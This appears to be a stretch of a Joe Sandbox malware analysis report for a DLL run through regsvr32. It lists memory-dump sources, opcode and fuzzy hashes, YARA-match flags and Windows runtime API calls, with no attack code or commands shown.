                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                    • Instruction ID: 8a210f576f06192acb1348665dce29b8299704b90f8c36c4c02948eefca36544
                                                                    • Opcode Fuzzy Hash: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                    • Instruction Fuzzy Hash: 98819EB590034E8FCB48CF68C48A5DE7FB0BB68394F614219F8569A260D774DAA5CFC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                    • Instruction ID: a715a821166c3325a5f96f2d5301173626eb48cd37bd72c2dcb4fea3562e42b3
                                                                    • Opcode Fuzzy Hash: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                    • Instruction Fuzzy Hash: 79512EB150074A8BDB49DF28C0D76AE3FE1EB64388F20411DFD468A295D774DAA9CBC1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f7aced778150c02bbca5db0e3f41738242a846810a111e238ccae7171f94d46c
                                                                    • Instruction ID: fc479b7e82b21315ffd406d8fba444b33d09de74539f70da2a8813263b1569c5
                                                                    • Opcode Fuzzy Hash: f7aced778150c02bbca5db0e3f41738242a846810a111e238ccae7171f94d46c
                                                                    • Instruction Fuzzy Hash: 65416D7020DB488FD768DF18948975ABBF0FB9A740F404A9DE5CAC7256D771D844CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                    • Instruction ID: dbb4fad0742d9b29c59b9a64f17438fc1cba9462e735a4e3b2d00d7b8da19945
                                                                    • Opcode Fuzzy Hash: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                    • Instruction Fuzzy Hash: 4C5192B490038E8FCB48CF69C84A5DE7BB1FB48358F104A19FC26A6250D7B4D665CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                    • Instruction ID: 08efbb833ea687ad733901112953304226336fcfa3581264405f9509991f6ff4
                                                                    • Opcode Fuzzy Hash: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                    • Instruction Fuzzy Hash: 6551BEB490074A8BCB48CF68D4875DE7FB0FB68398F20421DEC56AA250D3B496A5CFD4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                    • Instruction ID: 52c1f8436ada09c5d91cc0f6a0e49c089501cc81ef075f7e28a52ff611ebfcf9
                                                                    • Opcode Fuzzy Hash: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                    • Instruction Fuzzy Hash: D351B3B190438E8FCB48DF68D98A5DE7BB0FB48348F104A19FC26A6250D3B4D664CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                    • Instruction ID: 871f118089c9e262c63038bd4f0fd9666d89e9c6fa6f13266ea976bdce614408
                                                                    • Opcode Fuzzy Hash: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                    • Instruction Fuzzy Hash: CB41393190071DABDB95CFA4C8892EEBBF1FF44358F608159E852A7384DBB49685CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                    • Instruction ID: 72cb41ac5f9990f9c197b8bd4b5430fc958a2c545255f7632808fe9bc15cd904
                                                                    • Opcode Fuzzy Hash: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                    • Instruction Fuzzy Hash: A141D27090034A8BCB48DF68D8865DE7FB0FB58388F20461DE81AA6350D3B896A5CBD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
                                                                    • Instruction ID: 5a85513126e01a98bb902dccfe4af02f6196fd3989a765a33a65cbdcda0cb452
                                                                    • Opcode Fuzzy Hash: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
                                                                    • Instruction Fuzzy Hash: 0641E5B091038A8FCF88DF64D84A5DE7BB0FB58358F104A1DFC65A6250E3B49664CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                    • Instruction ID: 77361ced58272e7b73a95c704b243c92926a81ca7bf4620d616fd1e275fcbc28
                                                                    • Opcode Fuzzy Hash: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                    • Instruction Fuzzy Hash: A841D2B190434E8FCB48DF68C4865DE7FF0FB58388F204219E859A6250D3B896A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _getptd
                                                                    • String ID:
                                                                    • API String ID: 3186804695-0
                                                                    • Opcode ID: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                    • Instruction ID: 10f7ed8437342b922bf61d679db088ff69bf528cf122ab7763bfe339a6fa4a8a
                                                                    • Opcode Fuzzy Hash: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                    • Instruction Fuzzy Hash: 62319222E1868141EB649B3AD8253AE66B1FB85BC0F585135EE4E47BA5DE3CD501C708
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                    • Instruction ID: 4f2f4704f2b9e1c234c275d0f4f9a14eb4d491f2b4b6dbd4d57755e8fe2c6edd
                                                                    • Opcode Fuzzy Hash: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                    • Instruction Fuzzy Hash: 6341C4B090438ECFCF48CF68C8895CE7BB0FF58358F114A19E825A6250D3B49665CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
                                                                    • Instruction ID: 4854a602bbf38c78d9fab67e5db6ce586c5dff59e36b89151347ba9907d49bba
                                                                    • Opcode Fuzzy Hash: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
                                                                    • Instruction Fuzzy Hash: D13189B0529781ABD78CDF28C49981EBBE1FBC8344FC46A2DF9868B350D7749405CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                    • Instruction ID: a8885bbbd8deb659e28c33910928e4ea9ad8e802d57f0785ac04cb05f9903a21
                                                                    • Opcode Fuzzy Hash: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                    • Instruction Fuzzy Hash: 802160B0528784AFC398DF28D49981ABBF1FB89344F806A1DF98687350E374D459CB43
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                    • Instruction ID: 3e7ffcddda8d873ed620f17f9684606eb13d1dd5f0b21141b7977a2e64531d07
                                                                    • Opcode Fuzzy Hash: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                    • Instruction Fuzzy Hash: AF217F74529780AFC788DF29C08981EBBE1FB99748F806A1DF88697354D375D445CF42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
                                                                    • Instruction ID: 85e8bde3e512593198615bb83ad7c533a741442781c438c8658c5734f088230b
                                                                    • Opcode Fuzzy Hash: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
                                                                    • Instruction Fuzzy Hash: AA2148B4508384CBD349DF29D05951BBBE0BB8D75CF900B1DF4CAAB264D7789644CB0A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                    • Instruction ID: a9fada880666985ce08a18f9a1f547edd74f8eac46501c11455bf7efca8cad68
                                                                    • Opcode Fuzzy Hash: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                    • Instruction Fuzzy Hash: EEB09B25F0D754454765470758045195593B79CFD460450359D0D53B64D93C96404740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 1012874770-0
                                                                    • Opcode ID: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
                                                                    • Instruction ID: 7d9f93f2a6759918aa09a2ccfbcef3b34c79bc1c291ab9376ad735e6d498ffe5
                                                                    • Opcode Fuzzy Hash: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
                                                                    • Instruction Fuzzy Hash: 9A418322E5588281EB76EA21DCA23BD52B0BF88B44F447131EE4D8AAB6CE15D945C354
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: DecodeErrorLastPointer_errno$AddressLibraryLoadProc
                                                                    • String ID: ADVAPI32.DLL$SystemFunction036
                                                                    • API String ID: 1558914745-1064046199
                                                                    • Opcode ID: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                    • Instruction ID: ca9a033f050ce10914911ac3fbfdf44463ae18092c043f36ccd1b4df420a3941
                                                                    • Opcode Fuzzy Hash: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                    • Instruction Fuzzy Hash: 0A314325E0964246FB20AB65EC2527D23F1BF44B80F446438DE0DC7FA5EE3CE6458648
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFF21BC07CE), ref: 00007FFF21BC02F9
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFF21BC07CE), ref: 00007FFF21BC030D
                                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFF21BC07CE), ref: 00007FFF21BC0410
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CompareErrorInfoLastString
                                                                    • String ID:
                                                                    • API String ID: 3723911898-0
                                                                    • Opcode ID: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                    • Instruction ID: 081010462dfbb6269fe50bd62f8e962295e204aa161dd044e710915fe881dcd6
                                                                    • Opcode Fuzzy Hash: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                    • Instruction Fuzzy Hash: 9DE18226E0A2828FEB308F11989467E77F2FB84794F546535DA5D87BE4CE3CA944C708
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$DecodeEncode$ConsoleCtrlErrorHandlerLast__doserrno_errno_lock
                                                                    • String ID:
                                                                    • API String ID: 3466867069-0
                                                                    • Opcode ID: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                    • Instruction ID: 6c3edc731cd92c34e595549b9fadbb530592dfc77480808da0abff7037dda5bb
                                                                    • Opcode Fuzzy Hash: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                    • Instruction Fuzzy Hash: 20719921E0960255FB7A971ADC7627D22F1BF81780F182536CD9EC6EF1DE2CEA41C249
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$_lock$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 1575098132-0
                                                                    • Opcode ID: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                    • Instruction ID: f5640126ab113db89a3dce02a55df39e126d97883aef986debf5e9160aa74603
                                                                    • Opcode Fuzzy Hash: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                    • Instruction Fuzzy Hash: 3231F611E0A54285FF79EA629CB137D62F0BF84B44F443575EE0E86AB6CE1CBA408359
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$_errno$DecodeEnvironmentPointerVariable__wtomb_environ
                                                                    • String ID: @CW
                                                                    • API String ID: 3451773520-2709556291
                                                                    • Opcode ID: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                    • Instruction ID: a9cedf31461e26252f2753ab871bfb2a96ed5dec6894bb9746f90a78b2057f66
                                                                    • Opcode Fuzzy Hash: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                    • Instruction Fuzzy Hash: 3CA1A229E0B64249EB20AB15ED1027E62F1FF40798F14A635DE5DC7BF5DE3CA4958308
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$ErrorInfoLast
                                                                    • String ID:
                                                                    • API String ID: 189849726-0
                                                                    • Opcode ID: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                    • Instruction ID: f72d10344d22f65206ec499cea91a85fd4da24720d325289b6c8058be0c0c4d4
                                                                    • Opcode Fuzzy Hash: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                    • Instruction Fuzzy Hash: 0DB1BF32E0969186DB20CF25A8A02AD77E4FB49744F845136EF5C87BA1DF3DD641C708
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 1012874770-0
                                                                    • Opcode ID: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                    • Instruction ID: 41d7e3cd3ee11226bbe0ece04fa4e42121eab9901ca0d0b88f6b4a550c67def1
                                                                    • Opcode Fuzzy Hash: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                    • Instruction Fuzzy Hash: C441ED32E0994684EF759E21DDA43BD23F0BF98B44F442031DE0E8AAB5CE2DE691C355
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFF21BBE292
                                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFF21BBE2B1
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFF21BBE356
